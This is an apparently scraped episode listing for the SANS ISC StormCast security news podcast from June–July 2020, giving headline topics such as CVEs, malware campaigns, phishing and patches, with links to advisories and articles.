Obfuscated Malware https://isc.sans.edu/forums/diary/If+You+Want+Something+Done+Right+You+Have+To+Do+It+Yourself+Malware+Too/26320/ PaloAlto Networks PAN-OS CVE-2020-2034 https://security.paloaltonetworks.com/CVE-2020-2034 Citrix Vulnerability Details (CVE-2020-8194) https://dmaasland.github.io/posts/citrix.html Mozilla Suspending Send Service https://www.zdnet.com/article/mozilla-suspends-firefox-send-service-while-it-addresses-malware-abuse/
7/9/20206 minutes, 31 seconds
Episode Artwork

ISC StormCast for Wednesday, July 8th 2020

F5 Big IP Wrapup https://twitter.com/NCCGroupInfosec/status/1280593966879125504 https://www.sans.org/webcasts/116065 Citrix ADC / Citrix Gateway Patches https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/ Microsoft Releases Free Memory Analysis Service https://www.microsoft.com/en-us/research/blog/toward-trusted-sensing-for-the-cloud-introducing-project-freta/
7/8/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Wednesday, July 8th 2020

F5 Big IP Wrapup https://twitter.com/NCCGroupInfosec/status/1280593966879125504 https://www.sans.org/webcasts/116065 Citrix ADC / Citrix Gateway Patches https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/ Microsoft Releases Free Memory Analysis Service https://www.microsoft.com/en-us/research/blog/toward-trusted-sensing-for-the-cloud-introducing-project-freta/
7/8/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, July 7th 2020

More BigIP Exploits https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/ Special F5 BigIP Webcast https://www.sans.org/webcasts/116065 Microsoft ATP Web Content Filtering https://techcommunity.microsoft.com/t5/microsoft-defender-atp/an-update-on-web-content-filtering/ba-p/1505445 Ouch Newsletter: Ransomware https://www.sans.org/security-awareness-training/resources/ransomware Extended Research Feed: Added Net Systems Research https://isc.sans.edu/api/threatcategory/research
7/7/20205 minutes, 20 seconds
Episode Artwork

ISC StormCast for Tuesday, July 7th 2020

More BigIP Exploits https://isc.sans.edu/forums/diary/Summary+of+CVE20205902+F5+BIGIP+RCE+Vulnerability+Exploits/26316/ Special F5 BigIP Webcast https://www.sans.org/webcasts/116065 Microsoft ATP Web Content Filtering https://techcommunity.microsoft.com/t5/microsoft-defender-atp/an-update-on-web-content-filtering/ba-p/1505445 Ouch Newsletter: Ransomware https://www.sans.org/security-awareness-training/resources/ransomware Extended Research Feed: Added Net Systems Research https://isc.sans.edu/api/threatcategory/research
7/7/20205 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, July 6th 2020

F5 BigIP Critical RCE https://support.f5.com/csp/article/K52145254 https://isc.sans.edu/forums/diary/CVE20205902+F5+BIGIP+Exploitation+Attempt/26310/ https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller Guacamole RDP Gateway Vulnerability https://blog.checkpoint.com/2020/07/02/hole-y-guacamole-fixing-critical-vulnerabilities-in-apaches-popular-remote-desktop-gateway/ Barclays Caught Serving Code from Wayback Machine https://www.theregister.com/2020/07/03/barclays_bank_javascript_wayback_machine/
7/6/20206 minutes, 15 seconds
Episode Artwork

ISC StormCast for Monday, July 6th 2020

F5 BigIP Critical RCE https://support.f5.com/csp/article/K52145254 https://isc.sans.edu/forums/diary/CVE20205902+F5+BIGIP+Exploitation+Attempt/26310/ https://github.com/rapid7/metasploit-framework/pull/13807/commits/0417e88ff24bf05b8874c953bd91600f10186ba4 https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller Guacamole RDP Gateway Vulnerability https://blog.checkpoint.com/2020/07/02/hole-y-guacamole-fixing-critical-vulnerabilities-in-apaches-popular-remote-desktop-gateway/ Barclays Caught Serving Code from Wayback Machine https://www.theregister.com/2020/07/03/barclays_bank_javascript_wayback_machine/
7/6/20206 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, July 2nd 2020

Alina PoS Malware Exfiltrating Data via DNS https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/ Evil Quest "Ransomware" Update https://objective-see.com/blog/blog_0x59.html IBM Cyber Resilient Organziation Report https://www.ibm.com/account/reg/us-en/signup?formid=urx-45839
7/2/20204 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, July 2nd 2020

Alina PoS Malware Exfiltrating Data via DNS https://blog.centurylink.com/alina-point-of-sale-malware-still-lurking-in-dns/ Evil Quest "Ransomware" Update https://objective-see.com/blog/blog_0x59.html IBM Cyber Resilient Organziation Report https://www.ibm.com/account/reg/us-en/signup?formid=urx-45839
7/2/20204 minutes, 25 seconds
Episode Artwork

ISC StormCast for Wednesday, July 1st 2020

Window 10 / 2019 Server Out of Order Patch https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1425 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1457 MacOS Ransomare Arrives as Fake Little Snitch Software https://blog.malwarebytes.com/mac/2020/06/new-mac-ransomware-spreading-through-piracy/ VPN Privilege Escalation https://0xsha.io/posts/zombievpn-breaking-that-internet-security DNSSEC Phishing Scam https://nakedsecurity.sophos.com/2020/06/29/beware-secure-dns-scam-targeting-website-owners-and-bloggers/
7/1/20205 minutes, 54 seconds
Episode Artwork

ISC StormCast for Wednesday, July 1st 2020

Window 10 / 2019 Server Out of Order Patch https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1425 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1457 MacOS Ransomare Arrives as Fake Little Snitch Software https://blog.malwarebytes.com/mac/2020/06/new-mac-ransomware-spreading-through-piracy/ VPN Privilege Escalation https://0xsha.io/posts/zombievpn-breaking-that-internet-security DNSSEC Phishing Scam https://nakedsecurity.sophos.com/2020/06/29/beware-secure-dns-scam-targeting-website-owners-and-bloggers/
7/1/20205 minutes, 54 seconds
Episode Artwork

ISC StormCast for Tuesday, June 30th 2020

Sysmon 11.10 and ADS Logging https://isc.sans.edu/forums/diary/Sysmon+and+Alternate+Data+Streams/26292/ Paloalto PAN-OS SAML Vulnerability https://security.paloaltonetworks.com/CVE-2020-2021 Cisco Telnet Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-telnetd-EFJrEzPx https://appgateresearch.blogspot.com/2020/02/bravestarr-fedora-31-netkit-telnetd_28.html
6/30/20204 minutes, 35 seconds
Episode Artwork

ISC StormCast for Tuesday, June 30th 2020

Sysmon 11.10 and ADS Logging https://isc.sans.edu/forums/diary/Sysmon+and+Alternate+Data+Streams/26292/ Paloalto PAN-OS SAML Vulnerability https://security.paloaltonetworks.com/CVE-2020-2021 Cisco Telnet Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-telnetd-EFJrEzPx https://appgateresearch.blogspot.com/2020/02/bravestarr-fedora-31-netkit-telnetd_28.html
6/30/20204 minutes, 35 seconds
Episode Artwork

ISC StormCast for Monday, June 29th 2020

MacOS 11 Security Changes https://www.sentinelone.com/blog/macos-big-sur-9-big-surprises-for-enterprise-security/ Certificate Lifetime Limited to 1 Year Starting September https://chromium.googlesource.com/chromium/src/+/ae4d6809912f8171b23f6aa43c6a4e8e627de784 https://support.apple.com/en-us/HT211025 https://lists.cabforum.org/pipermail/servercert-wg/2020-June/002000.html
6/29/20207 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, June 29th 2020

MacOS 11 Security Changes https://www.sentinelone.com/blog/macos-big-sur-9-big-surprises-for-enterprise-security/ Certificate Lifetime Limited to 1 Year Starting September https://chromium.googlesource.com/chromium/src/+/ae4d6809912f8171b23f6aa43c6a4e8e627de784 https://support.apple.com/en-us/HT211025 https://lists.cabforum.org/pipermail/servercert-wg/2020-June/002000.html
6/29/20207 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, June 26th 2020

Recordings of the Tech Tuesday Workshop https://isc.sans.edu/forums/diary/Tech+Tuesday+Recap+Recordings+Part+2+Installing+the+Honeypot+release/26280/ https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A Credit Card Skimmers Hide Code in Favicon EXIF Data https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/ GeoVision Scanners Vulnerabilities https://thehackernews.com/2020/06/geovision-scanner-vulnerabilities.html Docker Images Containing Cryptojacking Malware https://unit42.paloaltonetworks.com/cryptojacking-docker-images-for-mining-monero/ SANS.edu Student Karim Lalji: https://www.sans.org/reading-room/whitepapers/threathunting/real-time-honeypot-forensic-investigation-german-organized-crime-network-39640
6/26/202016 minutes, 43 seconds
Episode Artwork

ISC StormCast for Friday, June 26th 2020

Recordings of the Tech Tuesday Workshop https://isc.sans.edu/forums/diary/Tech+Tuesday+Recap+Recordings+Part+2+Installing+the+Honeypot+release/26280/ https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A Credit Card Skimmers Hide Code in Favicon EXIF Data https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/ GeoVision Scanners Vulnerabilities https://thehackernews.com/2020/06/geovision-scanner-vulnerabilities.html Docker Images Containing Cryptojacking Malware https://unit42.paloaltonetworks.com/cryptojacking-docker-images-for-mining-monero/ SANS.edu Student Karim Lalji: https://www.sans.org/reading-room/whitepapers/threathunting/real-time-honeypot-forensic-investigation-german-organized-crime-network-39640
6/26/202016 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, June 25th 2020

Using Shell Links as zero-touch downloaders and to initiate network connections https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/ Chrome Updates Released https://chromereleases.googleblog.com/2020/06/stable-channel-update-for-desktop_22.html QNAP Updates for Helpdesk https://www.qnap.com/de-de/security-advisory/qsa-20-03 Magento Update https://helpx.adobe.com/security/products/magento/apsb20-41.html Attacks Against Microsoft Exchange Servers https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/
6/25/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, June 25th 2020

Using Shell Links as zero-touch downloaders and to initiate network connections https://isc.sans.edu/forums/diary/Using+Shell+Links+as+zerotouch+downloaders+and+to+initiate+network+connections/26276/ Chrome Updates Released https://chromereleases.googleblog.com/2020/06/stable-channel-update-for-desktop_22.html QNAP Updates for Helpdesk https://www.qnap.com/de-de/security-advisory/qsa-20-03 Magento Update https://helpx.adobe.com/security/products/magento/apsb20-41.html Attacks Against Microsoft Exchange Servers https://www.microsoft.com/security/blog/2020/06/24/defending-exchange-servers-under-attack/
6/25/20205 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, June 24th 2020

Analysis Of Traffic Targeting CyberBunker IP Space https://isc.sans.edu/forums/diary/Cyberbunker+20+Analysis+of+the+Remnants+of+a+Bullet+Proof+Hosting+Provider/26266/ Microsoft Offering Enterprise Security Products for Linux/Android https://techcommunity.microsoft.com/t5/microsoft-defender-atp/announcing-microsoft-defender-atp-for-android/ba-p/1480787 https://techcommunity.microsoft.com/t5/microsoft-defender-atp/microsoft-defender-atp-for-linux-is-now-generally-available/ba-p/1482344 Microsoft Safe Documents https://techcommunity.microsoft.com/t5/microsoft-365-blog/safe-documents-is-generally-available/ba-p/1480401
6/24/20205 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, June 24th 2020

Analysis Of Traffic Targeting CyberBunker IP Space https://isc.sans.edu/forums/diary/Cyberbunker+20+Analysis+of+the+Remnants+of+a+Bullet+Proof+Hosting+Provider/26266/ Microsoft Offering Enterprise Security Products for Linux/Android https://techcommunity.microsoft.com/t5/microsoft-defender-atp/announcing-microsoft-defender-atp-for-android/ba-p/1480787 https://techcommunity.microsoft.com/t5/microsoft-defender-atp/microsoft-defender-atp-for-linux-is-now-generally-available/ba-p/1482344 Microsoft Safe Documents https://techcommunity.microsoft.com/t5/microsoft-365-blog/safe-documents-is-generally-available/ba-p/1480401
6/24/20205 minutes, 57 seconds
Episode Artwork

ISC StormCast for Tuesday, June 23rd 2020

Comparing Office Documents with WinMerge https://isc.sans.edu/forums/diary/Comparing+Office+Documents+with+WinMerge/26268/ VMWare Tools and Microsoft Office Updates for macOS https://www.vmware.com/security/advisories/VMSA-2020-0014.html https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1225 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1226 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1229 Remote Code Execution Vulnerability in Bitdefender https://palant.info/2020/06/22/exploiting-bitdefender-antivirus-rce-from-any-website/ Google Analytics Used to Exfiltrate Data https://www.perimeterx.com/tech-blog/2020/bypassing-csp-exflitrate-data/
6/23/20207 minutes, 13 seconds
Episode Artwork

ISC StormCast for Tuesday, June 23rd 2020

Comparing Office Documents with WinMerge https://isc.sans.edu/forums/diary/Comparing+Office+Documents+with+WinMerge/26268/ VMWare Tools and Microsoft Office Updates for macOS https://www.vmware.com/security/advisories/VMSA-2020-0014.html https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1225 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1226 https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-1229 Remote Code Execution Vulnerability in Bitdefender https://palant.info/2020/06/22/exploiting-bitdefender-antivirus-rce-from-any-website/ Google Analytics Used to Exfiltrate Data https://www.perimeterx.com/tech-blog/2020/bypassing-csp-exflitrate-data/
6/23/20207 minutes, 13 seconds
Episode Artwork

ISC StormCast for Monday, June 22nd 2020

Sigma Rules! The Generic Signature Format for SIEM Systems https://isc.sans.edu/forums/diary/Sigma+rules+The+generic+signature+format+for+SIEM+systems/26258/ Pi Zero Honeypot https://isc.sans.edu/forums/diary/Pi+Zero+HoneyPot/26260/ Ransomware Operators Lurk on Your Network https://www.bleepingcomputer.com/news/security/ransomware-operators-lurk-on-your-network-after-their-attack/ Discord Modified to Steal Accounts https://www.bleepingcomputer.com/news/security/discord-modified-to-steal-accounts-by-new-nitrohack-malware/
6/22/20205 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, June 22nd 2020

Sigma Rules! The Generic Signature Format for SIEM Systems https://isc.sans.edu/forums/diary/Sigma+rules+The+generic+signature+format+for+SIEM+systems/26258/ Pi Zero Honeypot https://isc.sans.edu/forums/diary/Pi+Zero+HoneyPot/26260/ Ransomware Operators Lurk on Your Network https://www.bleepingcomputer.com/news/security/ransomware-operators-lurk-on-your-network-after-their-attack/ Discord Modified to Steal Accounts https://www.bleepingcomputer.com/news/security/discord-modified-to-steal-accounts-by-new-nitrohack-malware/
6/22/20205 minutes, 24 seconds
Episode Artwork

ISC StormCast for Friday, June 19th 2020

Broken Phishing Accidentially Exploiting Outlook Zero-Day https://isc.sans.edu/forums/diary/Broken+phishing+accidentally+exploiting+Outlook+zeroday/26254/ Webcast: https://www.sans.org/webcasts/sansatmic-catch-release-phishing-techniques-good-guys-115430 Cisco Updates Treck IP Stack: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC All Advisories: https://tools.cisco.com/security/center/publicationListing.x Netgear httpd Firmware Upload Stack-based Buffer Overflow RCE Vulnerability https://blog.grimm-co.com/2020/06/soho-device-exploitation.html Tech Tuesday Workshop: https://www.sans.org/webcasts/tech-tuesday-workshop-collaborating-scale-contribute-profit-internet-storm-center-115935
6/19/20205 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, June 19th 2020

Broken Phishing Accidentially Exploiting Outlook Zero-Day https://isc.sans.edu/forums/diary/Broken+phishing+accidentally+exploiting+Outlook+zeroday/26254/ Webcast: https://www.sans.org/webcasts/sansatmic-catch-release-phishing-techniques-good-guys-115430 Cisco Updates Treck IP Stack: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-treck-ip-stack-JyBQ5GyC All Advisories: https://tools.cisco.com/security/center/publicationListing.x Netgear httpd Firmware Upload Stack-based Buffer Overflow RCE Vulnerability https://blog.grimm-co.com/2020/06/soho-device-exploitation.html Tech Tuesday Workshop: https://www.sans.org/webcasts/tech-tuesday-workshop-collaborating-scale-contribute-profit-internet-storm-center-115935
6/19/20205 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, June 18th 2020

Odd Protest Spam (Scam?) Targeting Atlanta Police Foundation https://isc.sans.edu/forums/diary/Odd+Protest+Spam+Scam+Targeting+Atlanta+Police+Foundation/26248/ Zoom Publishes End-to-End Encryption Whitepaper https://github.com/zoom/zoom-e2e-whitepaper Linux ACPI Bug Defeats UEFI Secure Boot https://git.zx2c4.com/american-unsigned-language/tree/american-unsigned-language-2.sh Tech Tuesday Workshop: https://www.sans.org/webcasts/tech-tuesday-workshop-collaborating-scale-contribute-profit-internet-storm-center-115935
6/18/20207 minutes, 4 seconds
Episode Artwork

ISC StormCast for Thursday, June 18th 2020

Odd Protest Spam (Scam?) Targeting Atlanta Police Foundation https://isc.sans.edu/forums/diary/Odd+Protest+Spam+Scam+Targeting+Atlanta+Police+Foundation/26248/ Zoom Publishes End-to-End Encryption Whitepaper https://github.com/zoom/zoom-e2e-whitepaper Linux ACPI Bug Defeats UEFI Secure Boot https://git.zx2c4.com/american-unsigned-language/tree/american-unsigned-language-2.sh Tech Tuesday Workshop: https://www.sans.org/webcasts/tech-tuesday-workshop-collaborating-scale-contribute-profit-internet-storm-center-115935
6/18/20207 minutes, 4 seconds
Episode Artwork

ISC StormCast for Wednesday, June 17th 2020

Sextortion to the Next Level https://isc.sans.edu/forums/diary/Sextortion+to+The+Next+Level/26244/ TMobile Outage Due to Configuration Error https://www.scmagazine.com/home/security-news/outages-draw-speculation-of-ddos-attack-on-u-s-but-reality-likely-more-boring/ Vulnerability Analysis of 2500 Docker Hub Images https://arxiv.org/pdf/2006.02932.pdf Track IP Stack Contains Multiple Vulnerabilities https://www.kb.cert.org/vuls/id/257161
6/17/20206 minutes, 39 seconds
Episode Artwork

ISC StormCast for Wednesday, June 17th 2020

Sextortion to the Next Level https://isc.sans.edu/forums/diary/Sextortion+to+The+Next+Level/26244/ TMobile Outage Due to Configuration Error https://www.scmagazine.com/home/security-news/outages-draw-speculation-of-ddos-attack-on-u-s-but-reality-likely-more-boring/ Vulnerability Analysis of 2500 Docker Hub Images https://arxiv.org/pdf/2006.02932.pdf Track IP Stack Contains Multiple Vulnerabilities https://www.kb.cert.org/vuls/id/257161
6/17/20206 minutes, 39 seconds
Episode Artwork

ISC StormCast for Tuesday, June 16th 2020

HTML Based Phishing Run https://isc.sans.edu/forums/diary/HTML+based+Phishing+Run/26242/ Major T-Mobile Outage (may affect other carriers as well) https://twitter.com/NevilleRay/status/1272650750665953280 https://status.duo.com/incidents/txv7kq6tr0h8 Vulnerabilities in LTE and 5G Networks https://positive-tech.com/storage/articles/gtp-2020/threat-vector-gtp-2020-eng.pdf SANSFIRE Handler Talks Xavier Mertens: https://www.sans.org/webcasts/sansatmic-walk-logs-hell-115420 Bojan Zdrnja: https://www.sans.org/webcasts/sansatmic-arcane-web-mobile-application-vulnerHTML Phishing
6/16/20206 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, June 16th 2020

HTML Based Phishing Run https://isc.sans.edu/forums/diary/HTML+based+Phishing+Run/26242/ Major T-Mobile Outage (may affect other carriers as well) https://twitter.com/NevilleRay/status/1272650750665953280 https://status.duo.com/incidents/txv7kq6tr0h8 Vulnerabilities in LTE and 5G Networks https://positive-tech.com/storage/articles/gtp-2020/threat-vector-gtp-2020-eng.pdf SANSFIRE Handler Talks Xavier Mertens: https://www.sans.org/webcasts/sansatmic-walk-logs-hell-115420 Bojan Zdrnja: https://www.sans.org/webcasts/sansatmic-arcane-web-mobile-application-vulnerHTML Phishing
6/16/20206 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, June 15th 2020

Fileless Excel Malware https://isc.sans.edu/forums/diary/Malicious+Excel+Delivering+Fileless+Payload/26232/ Windows Update Issues https://support.microsoft.com/en-us/help/4566779/usb-printer-port-missing-after-disconnecting-printer-while-windows-10 https://answers.microsoft.com/en-us/windows/forum/all/cumulative-updates-june-9th-2020/45a8a7f3-cb89-459e-acf1-32d9de15c099 Privnote.com Phishing https://krebsonsecurity.com/2020/06/privnotes-com-is-phishing-bitcoin-from-users-of-private-messaging-service-privnote-com/ SANS @Mic Talk: ISC Handler Bojan Zdrnja https://www.sans.org/webcasts/sansatmic-arcane-web-mobile-application-vulnerabilities-115425
6/15/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, June 15th 2020

Fileless Excel Malware https://isc.sans.edu/forums/diary/Malicious+Excel+Delivering+Fileless+Payload/26232/ Windows Update Issues https://support.microsoft.com/en-us/help/4566779/usb-printer-port-missing-after-disconnecting-printer-while-windows-10 https://answers.microsoft.com/en-us/windows/forum/all/cumulative-updates-june-9th-2020/45a8a7f3-cb89-459e-acf1-32d9de15c099 Privnote.com Phishing https://krebsonsecurity.com/2020/06/privnotes-com-is-phishing-bitcoin-from-users-of-private-messaging-service-privnote-com/ SANS @Mic Talk: ISC Handler Bojan Zdrnja https://www.sans.org/webcasts/sansatmic-arcane-web-mobile-application-vulnerabilities-115425
6/15/20206 minutes, 16 seconds
Episode Artwork

ISC StormCast for Friday, June 12th 2020

Anti-Debugging JavaScript Techniques https://isc.sans.edu/forums/diary/AntiDebugging+JavaScript+Techniques/26228/ Facebook Messenger Desktop App Vulnerability https://blog.reasonsecurity.com/2020/06/11/persistence-method-using-facebook-messenger-desktop-app/ Outlook Massmailing Macros https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/ STI Student Research: Dennis Taggard; Ebb and Flow: Network Flow Logging as a Staple of Public Cloud Visibility or a Waning Imperative? Paper: https://www.sans.org/reading-room/whitepapers/cloud/ebb-flow-network-flow-logging-staple-public-cloud-visibility-waning-imperative-39580 Video: https://youtu.be/faoFx7Q3_aM
6/12/20207 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, June 12th 2020

Anti-Debugging JavaScript Techniques https://isc.sans.edu/forums/diary/AntiDebugging+JavaScript+Techniques/26228/ Facebook Messenger Desktop App Vulnerability https://blog.reasonsecurity.com/2020/06/11/persistence-method-using-facebook-messenger-desktop-app/ Outlook Massmailing Macros https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/ STI Student Research: Dennis Taggard; Ebb and Flow: Network Flow Logging as a Staple of Public Cloud Visibility or a Waning Imperative? Paper: https://www.sans.org/reading-room/whitepapers/cloud/ebb-flow-network-flow-logging-staple-public-cloud-visibility-waning-imperative-39580 Video: https://youtu.be/faoFx7Q3_aM
6/12/20207 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, June 11th 2020

Job Application Themed Malspam Pushes ZLoader https://isc.sans.edu/forums/diary/Job+applicationthemed+malspam+pushes+ZLoader/26222/ More Expiring Root CAs https://scotthelme.co.uk/impending-doom-root-ca-expiring-legacy-clients/ Black Lives Matter Themed Malware https://www.bleepingcomputer.com/news/security/fake-black-lives-matter-voting-campaign-spreads-trickbot-malware/
6/11/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Thursday, June 11th 2020

Job Application Themed Malspam Pushes ZLoader https://isc.sans.edu/forums/diary/Job+applicationthemed+malspam+pushes+ZLoader/26222/ More Expiring Root CAs https://scotthelme.co.uk/impending-doom-root-ca-expiring-legacy-clients/ Black Lives Matter Themed Malware https://www.bleepingcomputer.com/news/security/fake-black-lives-matter-voting-campaign-spreads-trickbot-malware/
6/11/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, June 10th 2020

Microsoft Patch Day https://isc.sans.edu/forums/diary/Microsoft+June+2020+Patch+Tuesday/26220/ SMBleed https://github.com/ZecOps/CVE-2020-1206-POC Adobe Patches https://helpx.adobe.com/security.html Intel Patch Day https://blogs.intel.com/technology/2020/06/ipas-security-advisories-for-june-2020/?linkId=100000012832617
6/10/20206 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, June 10th 2020

Microsoft Patch Day https://isc.sans.edu/forums/diary/Microsoft+June+2020+Patch+Tuesday/26220/ SMBleed https://github.com/ZecOps/CVE-2020-1206-POC Adobe Patches https://helpx.adobe.com/security.html Intel Patch Day https://blogs.intel.com/technology/2020/06/ipas-security-advisories-for-june-2020/?linkId=100000012832617
6/10/20206 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, June 9th 2020

Translating BASE64 Obfuscated Scripts https://isc.sans.edu/forums/diary/Translating+BASE64+Obfuscated+Scripts/26214/ Fake Ransomware Decryptor https://www.bleepingcomputer.com/news/security/fake-ransomware-decryptor-double-encrypts-desperate-victims-files/ GNUTLS TLS 1.3 Machine in the Middle https://gitlab.com/gnutls/gnutls/-/issues/1011 CallStranger UPNP Vulnerability https://callstranger.com/ Shellcode Analysis 101 https://www.sans.org/webcasts/sansatmic-shellcode-analysis-101-114160
6/9/20206 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, June 9th 2020

Translating BASE64 Obfuscated Scripts https://isc.sans.edu/forums/diary/Translating+BASE64+Obfuscated+Scripts/26214/ Fake Ransomware Decryptor https://www.bleepingcomputer.com/news/security/fake-ransomware-decryptor-double-encrypts-desperate-victims-files/ GNUTLS TLS 1.3 Machine in the Middle https://gitlab.com/gnutls/gnutls/-/issues/1011 CallStranger UPNP Vulnerability https://callstranger.com/ Shellcode Analysis 101 https://www.sans.org/webcasts/sansatmic-shellcode-analysis-101-114160
6/9/20206 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, June 8th 2020

PHP FastCGI Attacks https://isc.sans.edu/forums/diary/Not+so+FastCGI/26208/ Protest Cybersecurity https://isc.sans.edu/forums/diary/Cyber+Security+for+Protests/26210/ uBlock Origin Blocks Portscans https://www.bleepingcomputer.com/news/security/ublock-origin-ad-blocker-now-blocks-port-scans-on-most-sites/ QNAP Vulnerability https://www.qnap.com/en/security-advisory/qsa-20-01
6/8/20206 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, June 8th 2020

PHP FastCGI Attacks https://isc.sans.edu/forums/diary/Not+so+FastCGI/26208/ Protest Cybersecurity https://isc.sans.edu/forums/diary/Cyber+Security+for+Protests/26210/ uBlock Origin Blocks Portscans https://www.bleepingcomputer.com/news/security/ublock-origin-ad-blocker-now-blocks-port-scans-on-most-sites/ QNAP Vulnerability https://www.qnap.com/en/security-advisory/qsa-20-01
6/8/20206 minutes, 23 seconds
Episode Artwork

ISC StormCast for Friday, June 5th 2020

Anti-Debugging Technique Based on Memory Protection https://isc.sans.edu/forums/diary/AntiDebugging+Technique+based+on+Memory+Protection/26200/ Suspending Suspicious Domain Feed/Update to Researcher IP Feed https://isc.sans.edu/forums/diary/Suspending+Suspicious+Domain+Feed+Update+to+Researcher+IP+Feed/26204/ Bank Transaction Comments Used for Abusive Messages https://www.theregister.com/2020/06/04/commonwealth_bank_bans_indecent_transaction_descriptions/ Android Security Bulletin https://source.android.com/security/bulletin/2020-06-01 Android Wallpaper Crash https://www.androidauthority.com/android-wallpaper-crash-1124577/ STI Research Paper: Janusz Pazgier; Efficacy of UNIX HIDS https://www.sans.org/reading-room/whitepapers/detection/efficacy-unix-hids-39565
6/5/202013 minutes, 14 seconds
Episode Artwork

ISC StormCast for Friday, June 5th 2020

Anti-Debugging Technique Based on Memory Protection https://isc.sans.edu/forums/diary/AntiDebugging+Technique+based+on+Memory+Protection/26200/ Suspending Suspicious Domain Feed/Update to Researcher IP Feed https://isc.sans.edu/forums/diary/Suspending+Suspicious+Domain+Feed+Update+to+Researcher+IP+Feed/26204/ Bank Transaction Comments Used for Abusive Messages https://www.theregister.com/2020/06/04/commonwealth_bank_bans_indecent_transaction_descriptions/ Android Security Bulletin https://source.android.com/security/bulletin/2020-06-01 Android Wallpaper Crash https://www.androidauthority.com/android-wallpaper-crash-1124577/ STI Research Paper: Janusz Pazgier; Efficacy of UNIX HIDS https://www.sans.org/reading-room/whitepapers/detection/efficacy-unix-hids-39565
6/5/202013 minutes, 14 seconds
Episode Artwork

ISC StormCast for Thursday, June 4th 2020

Polish Malspam Pushes ZLoader Malware https://isc.sans.edu/forums/diary/Polish+malspam+pushes+ZLoader+malware/26196/ Cisco Patches IP-in-IP Flaw https://securityaffairs.co/wordpress/104192/security/ip-in-ip-flaw-cisco.html Zoom Fixes Two Critical Flaws https://blog.talosintelligence.com/2020/06/vuln-spotlight-zoom-code-execution-june-2020.html Firefox Disables Automatic DNS over HTTPS Selection to Prevent DDoS https://www.mozilla.org/en-US/firefox/77.0.1/releasenotes/
6/4/20205 minutes, 59 seconds
Episode Artwork

ISC StormCast for Thursday, June 4th 2020

Polish Malspam Pushes ZLoader Malware https://isc.sans.edu/forums/diary/Polish+malspam+pushes+ZLoader+malware/26196/ Cisco Patches IP-in-IP Flaw https://securityaffairs.co/wordpress/104192/security/ip-in-ip-flaw-cisco.html Zoom Fixes Two Critical Flaws https://blog.talosintelligence.com/2020/06/vuln-spotlight-zoom-code-execution-june-2020.html Firefox Disables Automatic DNS over HTTPS Selection to Prevent DDoS https://www.mozilla.org/en-US/firefox/77.0.1/releasenotes/
6/4/20205 minutes, 59 seconds
Episode Artwork

ISC StormCast for Wednesday, June 3rd 2020

